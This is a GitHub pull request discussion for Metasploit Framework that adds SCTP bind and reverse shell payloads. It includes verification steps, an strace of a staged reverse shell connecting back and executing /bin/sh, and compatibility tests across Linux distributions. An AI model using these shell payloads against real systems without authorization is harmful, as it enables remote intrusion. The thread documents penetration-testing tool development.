metasploit-framework
metasploit-framework copied to clipboard
rapid7
SCTP Sessions
With the introduction of SCTP socket support in Rex::Socket via https://github.com/rapid7/rex-socket/pull/56, Framework can utilize this protocol for session transports similarly to TCP as it is a stream-wise transport. Implement bind and reverse handlers for the new socket type. Implement example bind and reverse payloads using socat copying from the initial udp sessions implementation.
Testing: Rudimentary bind session test against local Libvirt Linux VM
Next steps: Implement the language-level payloads for the interpreters common to POSIX environments supporting SCTP. Implement meterpreter transports for SCTP in Python, PHP, Mettle, and Java modalities (Windows doesn't support it without carrying its own usermode protocol library).
Tell us what this change does. If you're fixing a bug, please mention the github issue number.
Please ensure you are submitting from a unique branch in your repository to master in Rapid7's.
Verification
List the steps needed to make sure this thing works
- [ ] Start
msfconsole - [ ]
use payload/cmd/unix/bind_socat_sctp - [ ] set RHOST to the machine on which you are running
socat - [ ] generate payload
- [ ] run payload on target (may need sudo to auto-load kmod)
- [ ]
to_handlerto initiate bind to thesocatSCTP listener - [ ] Verify interactive session
i have no idea how @h00die's commit is attached to this all of a sudden - digging.
After a bit of mucking about, it seems that some versions of netstat do see the socket, but ss seems to ignore it with the same flags on Arch linux (rolling distro with generally current bins):
$ ss -an|grep sctp
ss -an|grep sctp
$ netstat -an|grep sctp
netstat -an|grep sctp
sctp 0 1024 192.168.121.251:4444 192.168.121.1:39933 ESTABLISHED
$ ^Z
Background session 1? [y/N] y
(2023-01-18)20:28 (S:1 J:2)msf payload(cmd/unix/bind_socat_sctp) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix Shell Banner: bash: cannot set terminal process group (1205): Inappropriate ... 192.168.121.1:39933 -> 192.168.121.251:4444 (192.168.121.251)
Looks like i managed to get binary reverse-staging working on Linux (x64):
$ strace /tmp/pay.elf
execve("/tmp/pay.elf", ["/tmp/pay.elf"], 0x7ffefd202f00 /* 21 vars */) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0x7febc753f000
socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.121.1")}, 16) = 0
read(3, "j\3^H\377\316j!X\17\5u\366j;X\231H\273/bin/sh\0SH\211\347R"..., 38) = 38
dup2(3, 2) = 2
dup2(3, 1) = 1
dup2(3, 0) = 0
execve("/bin/sh", ["/bin/sh"], NULL) = 0
brk(NULL) = 0x55be7ea63f80
arch_prctl(0x3001 /* ARCH_??? */, 0x7ffec7ac0bd0) = -1 EINVAL (Invalid argument)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fbded10f000
Adding delayed tag until https://github.com/rapid7/rex-socket/pull/56 gets landed.
@gwillcox-r7 - ping to un-tag as delayed please. Got another new session type queued up last night, hoping to get these landed quickly as they're pretty straightforward other than platform targeting.
@sempervictus Thanks for the ping, I see the respective PR is landed, unmarking as delayed now
Linting needs fixed; but this can be rebased on master now to pull in the rex-socket changes from https://github.com/rapid7/rex-socket/pull/56
Verified linux/x64/shell/reverse_sctp worked fine when testing against Kali.
Was not able to get a shell on either Fedora 21 or 37. Ran strace and seems they don't support the protocol. Identical output on both machines.
I'm going to be off next week as I'm moving house. I'll un-assign myself for now and I'm happy for someone else to pick this up in the meantime if they want, or I can pick it up again once I'm back.
@cgranleese-r7 (or whomever is testing fedora), what does modinfo sctp kick back for output? I'm wondering if Fedora might not build the module at all, or have something akin to MODHARDEN preventing auto-loading of the module by non-privileged users. On our systems, i'm seeing:
description: Support for the SCTP protocol (RFC2960)
author: Linux Kernel SCTP developers <[email protected]>
alias: net-pf-10-proto-132
alias: net-pf-2-proto-132
srcversion: 18046A8AB1857CD7617BE33
depends: ip6_udp_tunnel,udp_tunnel,libcrc32c
Ran modinfo sctp against Fedora 37 & 21 as well as Kali for comparison.
Fedora 37 output
[foo@fedora ~]$ modinfo sctp
filename: /lib/modules/6.0.7-301.fc37.x86_64/kernel/net/sctp/sctp.ko.xz
license: GPL
description: Support for the SCTP protocol (RFC2960)
author: Linux Kernel SCTP developers <[email protected]>
alias: net-pf-10-proto-132
alias: net-pf-2-proto-132
depends: udp_tunnel,ip6_udp_tunnel
retpoline: Y
intree: Y
name: sctp
vermagic: 6.0.7-301.fc37.x86_64 SMP preempt mod_unload
sig_id: PKCS#7
signer: Fedora kernel signing key
sig_key: 36:D6:5C:AB:1C:52:F5:1C:CB:D6:B6:59:D6:37:B8:BA:EC:90:78:4F
sig_hashalgo: sha256
signature: 4A:1B:7E:B2:A2:4F:1B:14:A0:5C:15:02:F8:0A:DC:92:96:F3:A7:07:
B4:76:45:03:E7:39:71:FE:AB:F7:CD:05:B8:98:03:1F:01:A5:A6:4C:
DC:66:2E:84:FA:60:AF:13:19:69:EA:FE:0C:BB:21:60:78:84:F1:3C:
3F:81:3F:47:24:CB:E9:9D:E4:C6:F4:80:0E:FB:72:5E:D0:D8:68:41:
0A:DD:4E:0A:33:D6:D9:C1:9A:9F:4A:A8:FE:4B:68:7B:10:32:81:AC:
25:0A:4F:23:E3:6E:EB:CF:37:A9:10:99:C2:99:C5:E4:DE:5D:5F:A7:
50:83:A9:46:89:C2:10:6B:DD:41:B7:06:D9:6B:1D:07:D2:E8:DD:BB:
A3:31:9E:52:4C:2F:E5:BC:0C:1F:59:29:1F:7A:4E:2C:07:FC:C3:42:
A1:A2:8B:0C:39:A3:32:A2:A6:74:8A:5D:F4:9D:49:42:06:43:4E:E6:
8F:FE:E8:4E:61:F3:89:B7:DC:72:AB:4B:E6:F2:2F:46:DB:E3:1C:8A:
9C:DB:EA:A5:0E:D7:5E:82:3A:3D:E9:0D:38:E6:3D:48:A1:BD:50:6D:
9C:8C:BD:A7:FB:04:CF:6D:1B:79:0F:13:27:9C:05:EE:C8:ED:34:29:
AA:91:84:A9:B4:2E:F7:80:0D:27:2E:C0:04:8F:46:90:37:43:0E:17:
5A:CE:6C:68:44:BA:C6:59:53:F4:60:01:D2:26:A1:EF:85:CF:8C:DB:
BE:41:48:0D:A0:D6:B5:9B:AB:54:E0:B0:DA:08:9C:55:AD:4F:4B:44:
FE:14:22:D2:85:CE:E4:AE:4E:86:4B:CB:DF:B5:A3:E4:9C:61:57:28:
3F:8E:FE:94:6C:51:9F:CA:BC:E5:89:A4:D3:66:26:4B:B7:C8:46:3D:
2F:33:EB:28:0B:62:67:95:C3:93:CD:AB:2F:91:73:68:3A:B5:51:BC:
48:98:68:88:20:18:9F:0C:AE:01:7E:10:56:30:93:A8:9B:60:6D:DC:
D9:EC:E4:8C:62:EA:18:57:40:CA:78:D3:7A:F4:66:4E:22:C9:FE:E8:
6D:EA:42:4A:B5:15:72:E9:78:53:AB:F7:C5:09:E0:D6:8D:3A:8E:33:
88:F5:EF:51:91:36:C0:4E:B7:F4:E3:40:AF:8D:A3:5C:74:8F:85:45:
E3:DC:2E:D2:77:5A:B0:26:D9:6D:A0:18:B5:A7:A6:AF:C1:E0:FB:56:
8B:BD:5D:9A:1C:4A:C6:1D:53:35:72:54:3F:E7:F3:DB:CD:09:1F:E3:
5C:8B:4F:18:24:38:96:58:66:41:A0:F4:D8:07:D7:52:C5:54:0B:F4:
7D:87:20:E0:DB:8C:05:F4:59:31:7A:6D
parm: no_checksums:Disable checksums computing and verification (bool)
Fedora 21
[foo@localhost ~]$ modinfo sctp
modinfo: ERROR: Module sctp not found.
Kali
┌──(kali㉿kali)-[/mnt/metasploit-framework]
└─$ modinfo sctp
filename: /lib/modules/5.18.0-kali5-amd64/kernel/net/sctp/sctp.ko
license: GPL
description: Support for the SCTP protocol (RFC2960)
author: Linux Kernel SCTP developers <[email protected]>
alias: net-pf-10-proto-132
alias: net-pf-2-proto-132
depends: udp_tunnel,libcrc32c,ip6_udp_tunnel
retpoline: Y
intree: Y
name: sctp
vermagic: 5.18.0-kali5-amd64 SMP preempt mod_unload modversions
parm: no_checksums:Disable checksums computing and verification (bool)
I guess thats the beauty of Linux - we all build what we want. Rhel7 does apparently support it:
# cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.9 (Maipo)
# modinfo sctp
filename: /lib/modules/3.10.0-1160.el7.x86_64/kernel/net/sctp/sctp.ko.xz
license: GPL
description: Support for the SCTP protocol (RFC2960)
author: Linux Kernel SCTP developers <[email protected]>
alias: net-pf-10-proto-132
alias: net-pf-2-proto-132
retpoline: Y
rhelversion: 7.9
srcversion: 2ACA667B4EEDFCDBE7C9C3C
depends: libcrc32c
intree: Y
vermagic: 3.10.0-1160.el7.x86_64 SMP mod_unload modversions
signer: Red Hat Enterprise Linux kernel signing key
sig_key: F5:8B:27:1A:CB:D9:E0:E0:CE:5F:C2:D6:F0:81:AA:04:2C:E7:0F:75
sig_hashalgo: sha256
parm: no_checksums:Disable checksums computing and verification (bool)
cmd/unix/bind_socat_sctp
Tested against Kali Linux and everything worked as expected.
linux/x64/shell/reverse_sctp
Tested against Kali Linux and everything worked as expected.
cmd/windows/python/shell_reverse_sctp
Tested against Windows 10 and its seems it does not support SCTP.
cmd/unix/reverse_socat_sctp
Tested against Kali Linux and everything worked as expected.
Note
Fedora also currently appears to not support SCTP, was discussed in an above comment but thought I'd add it hear for future travelers.
@cgranleese-r7 how did you do that on Windows? Windows doesn't do SCTP :grin:. Is py bringing its own SCTP impl atop UDP or something?
@sempervictus That's my fault, I copy pasted the wrong results across. I had used the wrong workflow from my notes.
Will update the results for that module once I'm on for the day. Sorry about any confusion that caused.
I'm just trying to get a RHEL environment setup to run some additional tests against these module. If you could get the Lint / Lint msftidy (2.7) (pull_request) tests passing, I could then land this once I have all my testing completed.
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>
You can automate most of these changes with the -a flag:
rubocop -a <directory or file>
Please update your branch after these have been made, and reach out if you have any problems.
![github-actions[bot] avatar](https://avatars.githubusercontent.com/in/15368?v=4 "Published by a pub.dev verified publisher"){kind=small}
RHEL 8.1
Tested linux/x64/shell/reverse_sctp against RHEL 8.1 and it seems it also doesn't support SCTP:
modinfo sctp output:
I guess thats the beauty of Linux - we all build what we want. Rhel7 does apparently support it:
# cat /etc/redhat-release Red Hat Enterprise Linux Server release 7.9 (Maipo) # modinfo sctp filename: /lib/modules/3.10.0-1160.el7.x86_64/kernel/net/sctp/sctp.ko.xz license: GPL description: Support for the SCTP protocol (RFC2960) author: Linux Kernel SCTP developers <[email protected]> alias: net-pf-10-proto-132 alias: net-pf-2-proto-132 retpoline: Y rhelversion: 7.9 srcversion: 2ACA667B4EEDFCDBE7C9C3C depends: libcrc32c intree: Y vermagic: 3.10.0-1160.el7.x86_64 SMP mod_unload modversions signer: Red Hat Enterprise Linux kernel signing key sig_key: F5:8B:27:1A:CB:D9:E0:E0:CE:5F:C2:D6:F0:81:AA:04:2C:E7:0F:75 sig_hashalgo: sha256 parm: no_checksums:Disable checksums computing and verification (bool)
If you'd like, I can try and get a RHEL 7 environment setup and test it there as your output above showed it supports SCTP.
This sounds like a matrix job for buildbots:
- check if
sctpis compiled (is there a module, is it builtin?). - check if unprivileged auto-load of
sctpworks on the target (even if built, but either blacklisted or auto-load-disabled, it'll be prevented from working) - create an SCTP socketpair, write "test\n" into one side, verify reading "test\n" out of the other. (should help test BSDs too since the first two dont work the same there)
Output of that should roughly give us our compatible targets list.
I'd like to be able to believe that this will get wider use than it will, but UDP payloads showed that even with something so accessible as the most common "other" L4 transport, fewer young minds tend to think outside the box at lower layers of the stack and even reach for tooling of that kind. I dont think adding this to framework will move the needle on the volume of SCTP which global NIDS nets will detect along their observed wires; but i do think it'll be "that last key function" someone needs now and again in a tough situation which they'll at least have available through this work.
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
rubocop <directory or file> tools/dev/msftidy.rb <directory or file>You can automate most of these changes with the
-aflag:rubocop -a <directory or file>Please update your branch after these have been made, and reach out if you have any problems.
I'm happy to merge this for now and and I can put up a separate PR to fix the liniting. If you're happy enough with that?
I'm happy to merge this for now and and I can put up a separate PR to fix the linting
That sounds like a good way to get this out the door, let's go ahead and get this shipped 📈
Thanks folks, much appreciate the integration effort. Aside from raw IP sockets, are there any major OSI3 or OSI4 types remaining, or are we down to higher-layer types now?
Release Notes
This PR adds SCTP sessions which Metasploit Framework can utilize for session transports similarly to TCP as it is a stream-wise transport.
Thank you, now lets see how long it takes the blue side vendors to start reporting (increased) SCTP use in the wild :smile: